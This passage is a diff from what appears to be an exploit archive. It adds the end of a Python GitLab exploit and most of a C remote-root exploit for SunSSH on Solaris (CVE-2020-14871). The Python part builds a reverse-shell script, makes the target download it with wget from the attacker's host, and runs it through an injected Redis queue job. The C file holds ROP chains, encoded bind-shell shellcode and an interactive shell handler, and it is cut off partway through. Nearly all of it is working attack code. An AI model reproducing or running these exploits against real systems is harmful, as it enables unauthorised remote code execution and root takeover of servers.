+python_shell = 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'%(lhost,lport)
+
+
+os.system("touch shell.py")
+shell_file = open("shell.py","w")
+shell_file.write(python_shell)
+shell_file.close()
+
+
+print("[+] Reverse Shell Generated")
+time.sleep(1)
+
+print("[+] Start HTTP Server in current directory")
+
+
+print("Command : python3 -m http.server 80")
+time.sleep(2)
+
+http_server = raw_input("Continue (Y/N) : ")
+
+if (http_server=="N") or (http_server=="n"):
+	print("Start HTTP Server before running exploit")
+
+elif (http_server=="Y") or (http_server=="y"):
+
+	
+	
+	print("Run this script twice with options below to get SHELL!")
+	print("")
+	print("Option 1 : Download shell.py rev shell to server using wget")
+	print("Option 2 : Execute shell.py downloaded previously")
+
+	option = raw_input("Option (1/2) : ")
+
+
+	if option=="1":
+
+
+
+		reverse_shell= """\nmulti
+		 sadd resque:gitlab:queues system_hook_push
+		 lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|setsid wget http://%s/shell.py \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"
+		 exec
+		 exec
+		 exec\n""" %(lhost)
+		 
+		 
+		project_page = request.get(gitlab_url+"/projects/new")
+		html_content = project_page.text
+		soup = BeautifulSoup(html_content,features="lxml")
+		project_token = soup.findAll('meta')[16].get("content")
+		namespace_id = soup.find('input', {'name': 'project[namespace_id]'}).get('value')
+		urlencoded_token1 = project_token.replace("==","%3D%3D")
+		urlencoded_token_final = urlencoded_token1.replace("+","%2B")
+		
+
+		payload=b"utf8=%E2%9C%93&authenticity_token={}&project%5Bimport_url%5D={}{}&project%5Bci_cd_only%5D=false&project%5Bname%5D={}&project%5Bnamespace_id%5D={}&project%5Bpath%5D={}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0".format(urlencoded_token_final,ipv6_url,reverse_shell,project_name,namespace_id,project_name)
+
+
+
+
+
+
+		proxies = {
+			"http" : "http://127.0.0.1:8080",
+		     	"https" : "https://127.0.0.1:8080",
+			    }
+			    
+		cookies = {
+		    'sidebar_collapsed': 'false',
+		    'event_filter': 'all',
+		    'hide_auto_devops_implicitly_enabled_banner_1': 'false',
+		    '_gitlab_session':request.cookies['_gitlab_session'],
+		}
+
+		headers = {
+		    'Host': '10.129.49.31:5080',
+		    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
+		    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+		    'Accept-Language': 'en-US,en;q=0.5',
+		    'Accept-Encoding': 'gzip, deflate',
+		    'Referer': 'http://10.129.49.31:5080/projects',
+		    'Content-Type': 'application/x-www-form-urlencoded',
+		    'Content-Length': '398',
+		    'Connection': 'close',
+		    'Upgrade-Insecure-Requests': '1',
+		}
+
+
+
+		#response = request.post('http://10.129.49.31:5080/projects',data=payload,proxies=proxies,cookies=cookies,headers=headers,verify=False)
+
+		response1 = request.post(gitlab_url+'/projects',data=payload,cookies=cookies,proxies=proxies,headers=headers,verify=False)
+		print("[+] Success!")
+		time.sleep(1)
+		print("[+] Run Exploit with Option 2")
+		
+		
+	elif option=="2":
+
+		reverse_shell= """\nmulti
+		 sadd resque:gitlab:queues system_hook_push
+		 lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|setsid python3 shell.py \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"
+		 exec
+		 exec
+		 exec\n"""
+		 
+
+
+
+		project_page = request.get(gitlab_url+"/projects/new")
+		html_content = project_page.text
+		soup = BeautifulSoup(html_content,features="lxml")
+		project_token = soup.findAll('meta')[16].get("content")
+		namespace_id = soup.find('input', {'name': 'project[namespace_id]'}).get('value')
+		urlencoded_token1 = project_token.replace("==","%3D%3D")
+		urlencoded_token_final = urlencoded_token1.replace("+","%2B")
+
+
+		payload=b"utf8=%E2%9C%93&authenticity_token={}&project%5Bimport_url%5D={}{}&project%5Bci_cd_only%5D=false&project%5Bname%5D={}&project%5Bnamespace_id%5D={}&project%5Bpath%5D={}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0".format(urlencoded_token_final,ipv6_url,reverse_shell,project_name,namespace_id,project_name)
+
+
+
+
+
+
+		proxies = {
+			"http" : "http://127.0.0.1:8080",
+		     	"https" : "https://127.0.0.1:8080",
+			    }
+			    
+		cookies = {
+		    'sidebar_collapsed': 'false',
+		    'event_filter': 'all',
+		    'hide_auto_devops_implicitly_enabled_banner_1': 'false',
+		    '_gitlab_session':request.cookies['_gitlab_session'],
+		}
+
+		headers = {
+		    'Host': '10.129.49.31:5080',
+		    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
+		    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+		    'Accept-Language': 'en-US,en;q=0.5',
+		    'Accept-Encoding': 'gzip, deflate',
+		    'Referer': 'http://10.129.49.31:5080/projects',
+		    'Content-Type': 'application/x-www-form-urlencoded',
+		    'Content-Length': '398',
+		    'Connection': 'close',
+		    'Upgrade-Insecure-Requests': '1',
+		}
+
+
+
+		#response = request.post('http://10.129.49.31:5080/projects',data=payload,proxies=proxies,cookies=cookies,headers=headers,verify=False)
+
+		response1 = request.post(gitlab_url+'/projects',data=payload,cookies=cookies,proxies=proxies,headers=headers,verify=False)
+		print("[+] Success!")
+		time.sleep(1)
+		print("[+] Spawning Reverse Shell")
\ No newline at end of file
diff --git a/exploits/solaris/remote/49261.c b/exploits/solaris/remote/49261.c
new file mode 100644
index 000000000..404c67bbe
--- /dev/null
+++ b/exploits/solaris/remote/49261.c
@@ -0,0 +1,592 @@
+# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root 
+# Exploit Author: Hacker Fantastic
+# Vendor Homepage: https://www.oracle.com/solaris/technologies/solaris11-overview.html
+# Version: 11
+# Tested on: SunOS solaris 5.11 11.0
+
+/* SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871
+ * ====================================================================
+ * Makefile
+ * all: hfsunsshdx
+ *
+ *	hfsunsshdx: main.c
+ *	gcc main.c -o hfsunsshdx -lssh2 
+ *
+ *	clean:
+ *	rm -rf hfsunsshdx
+ *	rm -rf core.*
+ *
+ * A trivial to reach stack-based buffer overflow is present in libpam on
+ * Solaris. The vulnerable code exists in pam_framework.c parse_user_name()
+ * which allocates a fixed size buffer of 512 bytes on the stack and parses
+ * usernames into the buffer via modules (authtok_get) without bounds checks.
+ * This issue can be reached remotely pre-authentication via SunSSH when
+ * "keyboard-interactive" is enabled to use PAM based authentication. The
+ * vulnerability was discovered being actively exploited by FireEye in the
+ * wild and is part of an APT toolkit called "EVILSUN". The vulnerability
+ * is present in both SPARC/x86 versions of Solaris & others (eg. illumos).
+ * This exploit uses ROP gadgets to disable nxstack through mprotect on x86
+ * and a helper shellcode stub. The configuration in a default Solaris 
+ * install is vulnerable. The exploit makes use of libssh2 and tested on
+ * Solaris 10 through 11.0. Solaris 9 does not ship with a vulnerable 
+ * SunSSH implementation and versions later than 11.1 have updated SunSSH
+ * code that prevents the issue being triggered.
+ *
+ * e.g.
+ *  ./hfsunsshdx -s 192.168.11.220 -t 0 -x 2
+ *  [+] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871
+ *  [-] chosen target 'Solaris 11 11/11 11.0 Sun_SSH_2.0 x86'
+ *  [-] using shellcode 'Solaris 11.0 x86 bindshell tcp port 9999' 193 bytes
+ *  [+] ssh host fingerprint: 01bc34fe8092e051716b91fd88eed210db2df49e
+ *  [+] entering keyboard-interactive authentication.
+ *  [-] number of prompts: 1
+ *  [-] prompt 0 from server: 'Please enter user name: '
+ *  [-] shellcode length 193 bytes
+ *  [-] rop chain length 68
+ *  [-] exploit buffer length 580
+ *  [-] sending exploit magic buffer... wait
+ *  [+] exploit success, handling payload...
+ *  [-] connected.. enjoy :)
+ *  SunOS solaris 5.11 11.0 i86pc i386 i86pc
+ *   6:49pm  up 53 min(s),  1 user,  load average: 0.01, 0.01, 0.01
+ *  helpdesk   console      Nov 27 17:57
+ *  uid=0(root) gid=0(root)
+ *
+ * -- Hacker Fantastic (https://hacker.house)
+ */
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <ctype.h>
+#include <getopt.h>
+#include <time.h>
+#include <signal.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <sys/select.h>
+#include <arpa/inet.h>
+#include <sys/time.h>
+#include <libssh2.h>
+
+int sd = -1;
+int oldsd = -1;
+int ishell = -1;
+char* buf;
+char* payload;
+char* retaddr;
+struct sockaddr_in sain;
+
+struct target {
+	char* name;
+	char* ropchain;
+};
+
+struct shellcode {
+	char* name;
+	char* shellcode;
+};
+
+void spawn_shell(int);
+void bindshell_setup(short);
+void on_alarm(int);
+void on_interupt(int);
+void prepare_payload();
+
+const int targetno = 5;
+struct target targets[] = {
+	{"Solaris 11 11/11 11.0 Sun_SSH_2.0 x86",
+	"\x41\x42\x43\x44"  // %ebx
+	"\x45\x46\x47\x48"  // %esi 
+	"\x50\x51\x52\x53"  // %ebp
+	"\xa7\x0e\x06\x08"  // pop %ecx, pop %edx, pop %ebp
+	"\x9c\x3e\x04\x08"  // ptr to (0x?, 0x?, 0x8044cf0, 0x7) 
+	"\x01\x01\x04\x08"  // %edx unused, must be writeable addr
+	"\x41\x42\x43\x44"  // %ebp unused var 
+	"\x93\xdb\xc8\xfe"  // pop %edx ; ret
+	"\x01\x30\x04\x08"  // ptr to 0x08043001 mprotect arg
+	"\x1a\xe7\x0b\xfe"  // dec %edx ; ret 
+	"\x79\x41\xfe\xfe"  // mov %edx,$0x4(%ecx) ; xor %eax, %eax ; ret
+	"\x93\xdb\xc8\xfe"  // pop %edx ; ret 
+	"\x01\x30\x04\x08"  // ptr to shellcode
+	"\xe0\xe8\x3e\xfe"  // mov $0x72,%al 
+	"\x64\x7c\xc3\xfe"  // inc %eax ; ret
+        "\x64\x7c\xc3\xfe"  // inc %eax ; ret	
+	"\x22\x9d\xd3\xfe"},// sysenter
+	{"Solaris 11 Express (snv_151a) Sun_SSH_1.5 x86",
+	"\x41\x42\x43\x44"  // %ebx overwrite unused
+	"\x41\x42\x43\x44"  // %esi overwrite unused
+	"\xf8\x32\x04\x08"  // %ebp overwrite unused
+	"\xb7\xf9\x05\x08"  // pop %ecx ; pop %edx ; pop %ebp ; ret
+	"\x7e\x36\x02\x04"  // ptr/2 to (0x?, 0x0, 0x1000, 0x7) 
+	"\x01\x30\x04\x08"  // ptr for %edx
+	"\x44\x43\x42\x41"  // ptr for %ebp unused
+	"\xe4\xd4\xde\xfe"  // dec %edx ; add %ecx, %ecx ; ret
+	"\x19\x42\xfe\xfe"  // mov %edx,$0x4(%ecx) ; xor %eax, %eax; ret
+	"\xb8\xf9\x05\x08"  // pop %edx ; pop %ebp ; ret
+	"\xeb\x30\x04\x08"  // shellcode ptr for %edx
+	"\x1c\x33\x04\x08"  // %ebp & used by "leave"
+        "\x84\x98\x51\xfe"  // mov $0x82, %eax ; pop %esi ; pop %ebx ; leave ; ret
+        "\x41\x42\x43\x44"  // %esi unused
+        "\xe0\x30\x04\x08"  // shellcode ptr to %ebx                              
+        "\xe8\x32\x04\x08"  // ptr into %ebp        
+        "\x19\x3f\xfe\xfe"  // sub $0x4,%eax ; ret  
+        "\x19\x3f\xfe\xfe"  // sub $0x4,%eax ; ret
+        "\x19\x3f\xfe\xfe"  // sub $0x4,%eax ; ret
+        "\x11\x3f\xfe\xfe"  // sub $0x2,%eax ; ret
+	"\xfe\xf8\xcf\xfe"},// sysenter
+	{"Solaris 10 1/13 (147148-26) Sun_SSH_1.1.5 x86",
+	"\xc3\x31\x04\x08"  // overwrite %ebp unused
+	"\xa3\x6c\xd8\xfe"  // mov $0x74, %eax ; ret
+	"\x29\x28\x07\x08"  // pop %ebx ; ret
+	"\xf0\xff\xaf\xfe"  // 0x0a writen to address, unused gadget
+	"\x08\xba\x05\x08"  // pop %edx ; pop %ebp ; ret
+	"\x01\x30\x04\x08"  // %edx pointer to page
+	"\xb8\x31\x04\x08"  // unused %ebp value
+	"\xaa\x4c\x68\xfe"  // pop %ecx ; ret
+	"\xe0\x6e\x04\x08"  // ptr (0x?,0x0,0x1000,0x7)
+	"\x61\x22\x07\x08"  // dec %edx ; ret
+	"\x8b\x2d\xfe\xfe"  // mov %edx,0x4(%ecx) ; xor %eax,%eax ; ret
+	"\xa3\x6c\xd8\xfe"  // mov $0x74, %eax ; ret
+	"\x08\xba\x05\x08"  // pop %edx ; pop %ebp ; ret
+	"\xc3\x31\x04\x08"  // shellcode addr for %edx
+	"\xc3\x31\x04\x08"  // unused %ebp value
+	"\xf6\x0d\xf4\xfe"},// sysenter, (ret into shellcode via %edx)
+	{"Solaris 10 8/11 (147441-01) Sun_SSH_1.1.4 x86",
+	"\xc3\x31\x04\x08"  // overwrite %ebp unused
+	"\x73\x6a\xd7\xfe"  // mov $0x74, %eax ; ret
+	"\xb1\x26\x07\x08"  // pop %ebx ; ret
+	"\xff\x01\xac\xfe"  // write garbage here, unused gadget
+	"\x98\xb9\x05\x08"  // pop %edx ; pop %ebp ; ret
+	"\xff\x2f\x04\x08"  // %edx pointer to page
+	"\xc3\x31\x04\x08"  // unused %ebp value
+	"\x57\xaa\xe4\xfe"  // pop %ecx ; ret
+	"\x94\x11\x5f\xfe"  // ptr rwx (0x?,0x04b,0xe50,0x7)
+	"\xee\x6a\x65\xfe"  // inc %edx ; ret
+	"\x9b\xc5\xc1\xfe"  // mov %edx,0x4($ecx) ; xor %eax,%eax ; ret
+	"\x73\x6a\xd7\xfe"  // mov $0x74, %eax ; ret
+	"\x86\xae\xe5\xfe"  // pop %edx ; ret
+	"\xc3\x31\x04\x08"  // shellcode return address for %edx
+	"\x66\x56\xb9\xfe"},// sysenter (ret into shellcode via %edx)
+	{"Solaris all Sun_SSH_1.x.x debug crash target",
+	"\x41\x42\x43\x43"  // %ebp ptr
+	"\x78\x79\x80\x81"} // %eip ptr
+};
+
+const int shellno = 4;
+
+struct shellcode shellcodes[] = {
+	{"Solaris x86 bindshell tcp port 9999",
+	/* mprotect magic stub necessary for payloads expecting +x stack */
+	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9"
+	"\xbb\x01\x10\x04\x08\x66\xb8\x01\x70\xb1\x07\x4b\x48\x51\x50"
+	"\x53\x53\x89\xe1\x31\xc0\xb0\x74\xcd\x91"
+	/* mprotect_shellcode.S Solaris x86 mprotect(0x08044000,0x7000,0x07);
+	   ==================================================================
+		xorl %eax, %eax
+  		xorl %ecx, %ecx
+  		movl $0x08041001, %ebx
+  		movw $0x7001, %ax
+  		movb $0x7,%cl
+  		dec %ebx
+  		dec %eax
+  		pushl %ecx
+  		pushl %eax
+  		pushl %ebx
+  		pushl %ebx
+  		movl %esp, %ecx
+  		xorl %eax, %eax
+		movb $0x74, %al
+		int $0x91
+	*/
+	/* msfvenom -p solaris/x86/shell_bind_tcp -b "\x09\x20" LPORT=9999 -f c -e x86/xor_dynamic */
+	"\xeb\x23\x5b\x89\xdf\xb0\x55\xfc\xae\x75\xfd\x89\xf9\x89\xde"
+        "\x8a\x06\x30\x07\x47\x66\x81\x3f\x2a\x95\x74\x08\x46\x80\x3e"
+        "\x55\x75\xee\xeb\xea\xff\xe1\xe8\xd8\xff\xff\xff\x01\x55\x69"
+        "\xfe\xd9\xfe\x3d\x6b\x64\x88\xe7\xf6\x57\x05\xf7\x17\x30\xc1"
+        "\x51\x69\xfe\x03\x26\x0e\x88\xe6\x6b\x03\x51\x51\x6b\x03\x6b"
+        "\x03\xb1\xe7\xfe\xd7\x6b\x11\x56\x51\x30\xc1\xb1\xe9\xfe\xd7"
+        "\x5a\x51\x51\x52\xb1\xe8\xfe\xd7\xb1\xeb\xfe\xd7\x6b\x08\x51"
+        "\x6b\x3f\x59\xfe\xd7\xfe\x4e\xd9\x78\xf7\x51\x69\x2e\x2e\x72"
+        "\x69\x69\x2e\x63\x68\x6f\x88\xe2\x51\x52\x88\xe0\x51\x50\x52"
+        "\xb1\x3a\xfe\xd7\x2a\x95"},
+	{"Solaris x86 bindshell tcp port 8080",
+	/* mprotect magic stub necessary for payloads expecting +x stack */
+	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9"
+	"\xbb\x01\x10\x04\x08\x66\xb8\x01\x70\xb1\x07\x4b\x48\x51\x50"
+	"\x53\x53\x89\xe1\x31\xc0\xb0\x74\xcd\x91"
+	/* msfvenom -p solaris/x86/shell_bind_tcp -b "\x09\x20" LPORT=8080 -f c -e x86/xor_dynamic */
+	"\xeb\x23\x5b\x89\xdf\xb0\x9a\xfc\xae\x75\xfd\x89\xf9\x89\xde"
+	"\x8a\x06\x30\x07\x47\x66\x81\x3f\x44\x60\x74\x08\x46\x80\x3e"
+	"\x9a\x75\xee\xeb\xea\xff\xe1\xe8\xd8\xff\xff\xff\x01\x9a\x69"
+	"\xfe\xd9\xfe\x3d\x6b\x64\x88\xe7\xf6\x57\x05\xf7\x17\x30\xc1"
+	"\x51\x69\xfe\x03\x1e\x91\x88\xe6\x6b\x03\x51\x51\x6b\x03\x6b"
+	"\x03\xb1\xe7\xfe\xd7\x6b\x11\x56\x51\x30\xc1\xb1\xe9\xfe\xd7"
+	"\x5a\x51\x51\x52\xb1\xe8\xfe\xd7\xb1\xeb\xfe\xd7\x6b\x08\x51"
+	"\x6b\x3f\x59\xfe\xd7\xfe\x4e\xd9\x78\xf7\x51\x69\x2e\x2e\x72"
+	"\x69\x69\x2e\x63\x68\x6f\x88\xe2\x51\x52\x88\xe0\x51\x50\x52"
+	"\xb1\x3a\xfe\xd7\x44\x60"},
+	/* dup2(); and execve(); changed calling convention on 11.0, uses x86/shikata_ga_nai */ 
+	{"Solaris 11.0 x86 bindshell tcp port 9999", 
+	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+        "\x31\xc0\x31\xc9\x31\xd2\xbb\x01\x10\x04\x08\x66\xb8\x01\x70"
+	"\xb1\x07\x66\xba\x01\x10\x66\x31\xd3\x48\x51\x50\x53\x53\x89"
+	"\xe1\x31\xc0\xb0\x74\xcd\x91"//not encoded, stack address different
+	"\xb8\x5d\x6d\x26\x15\xda\xce\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
+	"\x19\x31\x42\x15\x83\xea\xfc\x03\x42\x11\xe2\xa8\x05\xd9\xcd"
+	"\xad\xea\x4f\x8b\xd8\xf5\x67\x05\xde\x0f\x91\x9b\x1e\xbf\xf6"
+	"\x24\x9c\x67\x08\x52\x47\x0d\x14\x34\xd7\xb8\x1a\xde\xd5\x8c"
+	"\xfd\xe1\x0f\x86\x11\x49\xff\x66\xd2\xc5\x17\x77\x04\x7e\xb7"
+	"\xdb\x19\x68\xc8\x0a\xe9\x81\xc9\x65\x60\x5f\x5f\x83\x25\x35"
+	"\xa1\xcb\x3a\x1f\x22\xa4\x1c\xd9\x2a\x0a\x5d\x4a\xba\x42\x72"
+	"\x18\x52\xf5\xa3\xbc\xcb\x6b\x35\xa3\x5b\x27\xcc\xc5\x0b\x97"
+	"\x9f\x56\x1b\x2c\xdf\x8f"},
+	/* dup2(); and execve(); changed calling convention on 11.0, uses x86/shikata_ga_nai */
+	{"Solaris 11.0 x86 bindshell tcp port 4444", 
+	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+        "\x31\xc0\x31\xc9\x31\xd2\xbb\x01\x10\x04\x08\x66\xb8\x01\x70"
+	"\xb1\x07\x66\xba\x01\x10\x66\x31\xd3\x48\x51\x50\x53\x53\x89"
+	"\xe1\x31\xc0\xb0\x74\xcd\x91"//not encoded, stack address different
+	"\xb8\x8d\x2e\x32\x79\xd9\xe5\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
+	"\x19\x31\x43\x15\x03\x43\x15\x83\xc3\x04\xe2\x78\x46\xcd\xa1"
+	"\x7d\xab\x5b\x37\x08\x32\x6c\xe1\x0e\x4d\x85\x3f\xce\xe1\xc2"
+	"\xc0\xcc\x1e\x83\xb6\x37\x4a\xa1\x98\xe7\xe1\xa7\x72\x05\x46"
+	"\x41\x7d\xdf\xcc\x9e\xd5\x8f\x21\x5f\x69\xc7\xbd\x89\xd1\x47"
+	"\x11\x86\x0f\x98\x43\x56\x25\x99\xba\xfd\xb3\x0f\x4a\x52\xae"
+	"\xf1\x14\xad\xf8\xf2\xea\x89\x7c\xfa\xc4\xe9\x2f\x6a\x08\xc5"
+	"\xbc\x02\x3e\x36\x21\xbb\xd0\xc1\x46\x6b\x7e\x5b\x69\xdb\xd0"
+	"\x0a\x39\x6b\xeb\x53\x6b"}
+};
+
+void spawn_shell(int sd) {
+#define sockbuflen 2048
+	int rcv;
+	char sockbuf[sockbuflen];
+	fd_set readfds;
+	memset(sockbuf,0,sockbuflen);
+	snprintf(sockbuf,sockbuflen,"uname -a;uptime;who;id\n");
+	write(sd,sockbuf,strlen(sockbuf));
+	while (1) {
+		FD_ZERO(&readfds);
+		FD_SET(0,&readfds);
+		FD_SET(sd,&readfds);
+		select(255,&readfds,NULL,NULL,NULL);
+		if (FD_ISSET(sd, &readfds)) {
+			memset(sockbuf,0,sockbuflen);
+			rcv = read(sd,sockbuf,sockbuflen);
+			if (rcv <= 0) {
+              			printf("\e[1m\e[34m[!] connection closed by foreign host.\n\e[0m");
+              			exit(-1);
+            		}
+			printf("%s",sockbuf);
+			fflush(stdout);
+		}
+      		if(FD_ISSET(0,&readfds)) {
+			memset(sockbuf,0,sockbuflen);
+			read(0,sockbuf,sockbuflen);
+			write(sd,sockbuf,strlen(sockbuf));
+        	}
+    	}
+}
+
+void bindshell_setup(short port){
+	oldsd = sd;
+        sd = socket(AF_INET,SOCK_STREAM,0);
+        sain.sin_port = htons(port);
+        if(connect(sd,(struct sockaddr*)&sain,sizeof(sain))<0){
+		printf("[!] fatal bind shell failed\n\e[0m");
+                exit(-1);
+        }
+	printf("[-] connected.. enjoy :)\e[0m\n");
+        spawn_shell(sd);
+}
+
+void on_alarm(int signum){
+	printf("[+] exploit success, handling payload...\n");
+	if(ishell==0||ishell==2){
+		bindshell_setup(9999);
+	}
+	if(ishell==1||ishell==3){
+		bindshell_setup(8080);
+	}
+	printf("[-] exploit complete\n\e[0m");
+	exit(0);
+}
+
+void on_interrupt(int signum){
+	printf("\e[1m\e[34m[!] interrupt caught... cleaning up\n\e[0m");
+	if(sd){
+		close(sd);
+	}
+	if(oldsd){
+		close(oldsd);
+	}
+	exit(0);
+}
+
+void prepare_payload(){ /* bad characters are 0x20 0x09 & 0x00 */
+#define payload_size 4096
+	int len = strlen(payload);
+	buf = malloc(payload_size);
+	char randchar = 'A';
+	char* randbuf = malloc(2);
+	if(!buf||!randbuf){
+		printf("[!] fatal payload buffer error\n");
+		exit(-1);
+	}
+	srand(time(NULL));
+	memset(buf,'\x00',payload_size);
+	memset(randbuf,0,2);
+	printf("[-] shellcode length %d bytes\n",len);
+	if(len < 512 && payload_size > 1024){
+		memcpy(buf,payload,len);
+		for(int i =0;i <= (512 - len);i++){
+ 			randchar = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"[random() % 52];
+			memcpy(randbuf,&randchar,1);
+			strcat(buf,randbuf);
+		}
+		len = strlen(retaddr);
+		printf("[-] rop chain length %d\n",len);
+		if(len + 512 < payload_size){
+			memcpy((void*)(long)buf+512,(void*)retaddr,len);
+			len = strlen(buf);
+			printf("[-] exploit buffer length %d\n",len);
+		}
+		else{
+			printf("[!] exploit buffer miscalculated\n");
+			exit(-1);
+		}
+	}
+	else{
+		printf("[!] exploit buffer miscalculated\n");
+		exit(-1);
+	}
+}
+
+static void kbd_callback(const char *name, int name_len,const char *instruction, int instruction_len,int num_prompts,const LIBSSH2_USERAUTH_KBDINT_PROMPT *prompts,LIBSSH2_USERAUTH_KBDINT_RESPONSE *responses, void **abstract) {
+	int i = 0;
+	signal(SIGALRM, &on_alarm);
+	printf("[+] entering keyboard-interactive authentication.\n");
+	printf("[-] number of prompts: %d\n", num_prompts);
+	printf("[-] prompt %d from server: '", i);
+	fwrite(prompts[i].text, 1, prompts[i].length, stdout);
+	printf("'\n");
+	prepare_payload();
+	//uncomment to pause for gdb debugging
+	//sleep(10);
+	responses[i].text = strdup(buf);
+	responses[i].length = strlen(buf);
+	printf("[-] sending exploit magic buffer... wait\n");
+	alarm(5);
+}
+
+int main(int argc,char **argv){
+	int ihost = 0, itarg = 0, port = 22, index = 0, rc = 0;
+	char* host;
+	int i, type, exitcode;
+	unsigned long hostaddr;
+	const char *fingerprint;
+	LIBSSH2_SESSION *session;
+	LIBSSH2_CHANNEL *channel;
+	char *exitsignal = (char *)"none";
+	size_t len;
+	LIBSSH2_KNOWNHOSTS *nh;
+	static struct option options[] = {
+		{"server", 1, 0, 's'},
+		{"port", 1, 0, 'p'},
+		{"target", 1, 0, 't'},
+		{"shellcode", 1, 0, 'x'},
+		{"help", 0, 0,'h'}
+        };
+	printf("\e[1m\e[34m[+] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871\n");
+	while(rc != -1) {
+	        rc = getopt_long(argc,argv,"s:p:t:x:h",options,&index);
+        	switch(rc) {
+               		case -1:
+	                        break;
+        	        case 's':
+				if(ihost==0){
+					host = malloc(strlen(optarg) + 1);
+					if(host){
+						sprintf(host,"%s",optarg);
+						ihost = 1;
+					}
+				}
+               			break;
+	                case 'p':
+				port = atoi(optarg);
+                	        break;
+			case 'x':
+				if(ishell==-1) {
+					rc = atoi(optarg);
+					switch(rc){
+						case 0:
+							printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode));
+							payload = malloc(strlen(shellcodes[rc].shellcode)+1);
+							if(payload){
+								memset(payload,0,strlen(shellcodes[rc].shellcode)+1);
+								memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode));
+								ishell = rc;
+							}
+							break;
+						case 1:
+							printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode));
+							payload = malloc(strlen(shellcodes[rc].shellcode)+1);
+							if(payload){
+								memset(payload,0,strlen(shellcodes[rc].shellcode)+1);
+								memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode));
+								ishell = rc;
+							}
+							break;
+						case 2:
+							printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode));
+							payload = malloc(strlen(shellcodes[rc].shellcode)+1);
+							if(payload){
+								memset(payload,0,strlen(shellcodes[rc].shellcode)+1);
+								memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode));
+								ishell = rc;
+							}
+							break;
+						case 3:
+							printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode));
+							payload = malloc(strlen(shellcodes[rc].shellcode)+1);
+							if(payload){
+								memset(payload,0,strlen(shellcodes[rc].shellcode)+1);
+								memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode));
+								ishell = rc;
+							}
+							break;
+
+						default:
+							printf("[!] Invalid shellcode selection %d\n",rc);
+							exit(0);
+							break;
+						}
+				}
+				break;
+	                case 't':
+				if(itarg==0){
+					rc = atoi(optarg);
+					switch(rc){
+						case 0:
+							printf("[-] chosen target '%s'\n",targets[rc].name);
+							retaddr = malloc(strlen(targets[rc].ropchain)+1);
+							if(retaddr){
+								memset(retaddr,0,strlen(targets[rc].ropchain)+1);
+								memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
+								itarg = rc;
+							}
+							break;
+						case 1:
+							printf("[-] chosen target '%s'\n",targets[rc].name);
+							retaddr = malloc(strlen(targets[rc].ropchain)+1);
+							if(retaddr){
+								memset(retaddr,0,strlen(targets[rc].ropchain)+1);
+								memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
+								itarg = rc;
+							}
+							break;
+						case 2:
+							printf("[-] chosen target '%s'\n",targets[rc].name);
+							retaddr = malloc(strlen(targets[rc].ropchain)+1);
+							if(retaddr){
+								memset(retaddr,0,strlen(targets[rc].ropchain)+1);
+								memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
+								itarg = rc;
+							}
+							break;
+						case 3:
+							printf("[-] chosen target '%s'\n",targets[rc].name);
